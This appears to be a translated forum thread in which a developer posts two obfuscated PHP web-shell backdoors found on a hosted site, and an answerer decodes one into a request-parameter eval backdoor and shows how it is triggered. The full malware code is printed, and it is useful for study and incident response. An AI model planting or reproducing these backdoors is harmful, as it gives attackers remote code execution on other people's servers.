我在我正在处理的景点的public_html目录中发现了几个奇怪的文件。 我称它们为奇怪,因为:
- 它们被命名为
wolakfie.php、txvepdhxy.php等。 - 它们包含看似无用的代码 - 不是明显的恶意,但肯定是可疑的。
- 我没有把它们放在那里。
现在,我不是第一个在这个网站上工作的开发人员,所以理论上他们过去可能做过一些事情。 下面是其中一个文件内容的示例:
<?php
$immanuel='JP';$armory='[L[r=t_ii';$forehead='e';$avowal ='G$I(P'; $hewett ='r';$blockading='c'; $folly= ' '; $balking='c';$caste= '$'; $aspirate ='?ca=R';$hegemony =')t,)aRo]';
$closing = 'e'; $knell ='epI$';
$delays ='R';$authors ='t';
$immortal ='r'; $displace='S'; $decomposition = 's'; $bastard = 'S';$aurelia='G'; $bisexual= 'H'; $canteen='R';$cager = 'O'; $lorain= 'r]Ogp$';$branden = 'r'; $durant ='(';$lacquered='?gD)(<ls$';$dreamt = '[tPv';$earls ='N;o")(_('; $flowing = 'o';$lactate =';'; $cabaret = 'ri"g)sEyr';
$censor = '@';
$asparagus= 'T""';
$graying= 'leopua';
$casper = 'e';$kiah='sraKTO';$become = 'CiiS';$flak= ':';
$madmax='_n(H';$economizing= 'Egf$v'; $clatter = 'O';
$indolently = '(';$interconnection= 'd';
$indefinite= 'n'; $georgina='veno';
$deviate ='v'; $appropriating='i'; $cocksure= 'oO,)AmHsa';$efface= '(sisL_]e';$influences='U'; $inched='F';$juxtaposes= 'a'; $jenna='Oc6reetO';
$colly= 'S';$corundum = '=i"PEosLE';
$icebergs ='f';$birchen= 'pP'; $brainwashes= 'QH))__';
$decoded ='tB$eTgod';$brooding= 'V';$equipoise = ':;_(eely';
$indignation='[';$brooks ='dQCohi_b'; $directing= '"';$inspirer= 'h';$gypping ='aOra)E';
$courier= '$'; $korey = 'e';$dropping= 'G'; $difficulties = ')';
$creature='K';
$blindfold = 'sa_T';
$dune ='r'; $badger= 'Hl(u'; $imagen = 'E'; $grasp = 'T';$apace='a';
$hunter= '$)4]';
$derision =';';$excoriate = 't';$auditor= '?';
$gecko='_(a';$checkbook = 'MSee$>s'; $foursome ='O_""'; $eben= $jenna['1'] .
$dune.$checkbook[3]. $gecko['2'] . $excoriate.
$checkbook[3] . $foursome['1'] . $icebergs. $badger['3'] .
$georgina['2']. $jenna['1'] .$excoriate. $brooks['5'].$brooks['3'] . $georgina['2'] ;$delano =$folly ;$blanching= $eben ($delano,$checkbook[3]. $deviate . $gecko['2'].$badger['1'] .
$gecko['1'] .$gecko['2'].$dune.$dune. $gecko['2'] .$equipoise['7'].$foursome['1'] . $birchen['0'] . $brooks['3'] .
$birchen['0']. $gecko['1'].
$icebergs.$badger['3'] .
$georgina['2'] .
$jenna['1'] .$foursome['1']. $decoded['5'] . $checkbook[3] .
$auditor ,
$excoriate.$foursome['1'].
$gecko['2'] .$dune.$decoded['5']. $checkbook[6] .
$gecko['1'] .$hunter['1'].
$hunter['1'] . $hunter['1'] .
$derision ); $blanching ($auditor,$cocksure['2'] , $evered['5'] ,
$fineness,
$baths['5'] ,$checkbook['4'], $cocksure['4'] ,
$brooks['7'] ,
$checkbook['4'].
$brooks['5'].$corundum['0'] .
$gecko['2'] .$dune. $dune .$gecko['2'] .$equipoise['7'] . $foursome['1'] .$cocksure['5'].$checkbook[3]. $dune. $decoded['5'] .
$checkbook[3].$gecko['1'].
$checkbook['4'] . $foursome['1']. $canteen .$imagen.
$brooks[1].$influences.
$imagen. $checkbook['1']. $grasp . $cocksure['2'].$checkbook['4'] . $foursome['1'] .$brooks['2'] . $foursome[0] .$foursome[0] .$creature. $knell['2'].$imagen . $cocksure['2'].$checkbook['4'].$foursome['1'] . $checkbook['1'] . $imagen .
$canteen. $brooding.$imagen. $canteen . $hunter['1'] . $derision.
$checkbook['4'].$gecko['2']. $corundum['0']. $brooks['5'].
$checkbook[6] . $checkbook[6] . $checkbook[3].$excoriate .$gecko['1']. $checkbook['4'] .$brooks['5']. $indignation.
$foursome['3']. $checkbook[6].$brooks['3'] . $brooks['3'] .$brooks['3'] .$badger['1'].$birchen['0']. $inspirer .$decoded['5'] .$foursome['3']. $hunter['3'].$hunter['1'] . $auditor . $checkbook['4'] . $brooks['5'] .
$indignation. $foursome['3']. $checkbook[6] .$brooks['3'].$brooks['3'].$brooks['3'] .$badger['1'].$birchen['0'] .
$inspirer . $decoded['5'].$foursome['3'] . $hunter['3'] .
$equipoise['0'] .
$gecko['1'].$brooks['5'].$checkbook[6] . $checkbook[6].$checkbook[3] . $excoriate. $gecko['1'] . $checkbook['4']. $brooks['5']. $indignation.
$foursome['3'] . $badger[0].
$grasp.$grasp .
$birchen['1'] .
$foursome['1'] . $checkbook['1'] . $foursome[0] .$foursome[0]. $foursome[0]. $corundum['7'] .$birchen['1'].
$badger[0].$dropping .$foursome['3']. $hunter['3']. $hunter['1']. $auditor .$checkbook['4'].
$brooks['5'].
$indignation.$foursome['3'] .
$badger[0] .$grasp .$grasp .
$birchen['1'] .$foursome['1'] .$checkbook['1'].$foursome[0] .$foursome[0] .$foursome[0].$corundum['7'] . $birchen['1'] .$badger[0] .
$dropping .$foursome['3'] . $hunter['3']. $equipoise['0']. $brooks['0'].$brooks['5']. $checkbook[3].$hunter['1'] .
$derision .$checkbook[3].
$deviate.$gecko['2'].$badger['1'] . $gecko['1'] .$checkbook[6]. $excoriate . $dune.$dune.$checkbook[3]. $deviate. $gecko['1'] .
$brooks['7'].
$gecko['2']. $checkbook[6] .$checkbook[3].$jenna['2'] . $hunter['2'].$foursome['1'] .
$brooks['0'] .
$checkbook[3].$jenna['1'] .$brooks['3'] .$brooks['0'].
$checkbook[3].$gecko['1'] .$checkbook[6]. $excoriate. $dune .$dune.
$checkbook[3] . $deviate.
$gecko['1'] .$checkbook['4']. $gecko['2'] . $hunter['1'].
$hunter['1'].
$hunter['1'] .
$hunter['1'] .$derision );
没有明显的base64_encode或eval,但代码的奇怪和明显的无关紧要让我有点扬眉毛。 我可能会删除它们,但我首先想知道是否有人可以提供任何见解。 该网站位于由GoDaddy托管的共享Linux服务器上。
更新:我发现了另一个看起来有一些eval:
<?php $oypsfe=chr(99).chr(114)."e"."'x61"."'x74"."'x65"."'x5f".chr(102).chr(117)."'x6e"."c"."'x74"."i"."'x6f"."n";$rfktbj = $oypsfe('$a',strrev(';)a$(lave')); $rfktbj(strrev(';))"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"(edoced_46esab(lave'));?>
我问题的结果是:
- 这段代码
- 有什么作用,或者我怎样才能知道这段代码是做什么的?
- 如果我被黑客入侵了,我应该在哪里寻找如何处理问题?
它们包含看似无用的代码 - 不是明显的恶意,但肯定是可疑的。
他们非常恶意。
第一个代码中的相关位:
$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["sooolphg"])?$i["sooolphg"]:(isset($i["HTTP_SOOOLPHG"])?
$i["HTTP_SOOOLPHG"] : die);
eval(strrev(base64_decode(strrev($a))));
它可以通过请求参数或 URL 查询字符串传入几乎任何有效负载。因此,任何提出像filename.php?sooolphg=1&HTTP_SOOLPHG=shellAccessEasilyHere这样的请求的人都可以通过eval有效负载来获得访问权限。参数 shellAccessEasilyHere 是一个命令字符串 - 反转,然后是 base64-ed,最后再次反转。像==QZjh2bgICSlxGbvByVvJHbkJyO这样的东西会呼应"Hello World"。
您可以在此处查看其他脚本的代码(出于显而易见的原因,我不在此处发布它): ideone.com/sUCJee
删除所有受感染的文件后,您将安全无虞。确保感染没有进入您自己的文件。
好在你从 git 中提取了未受感染(确保确实如此)版本。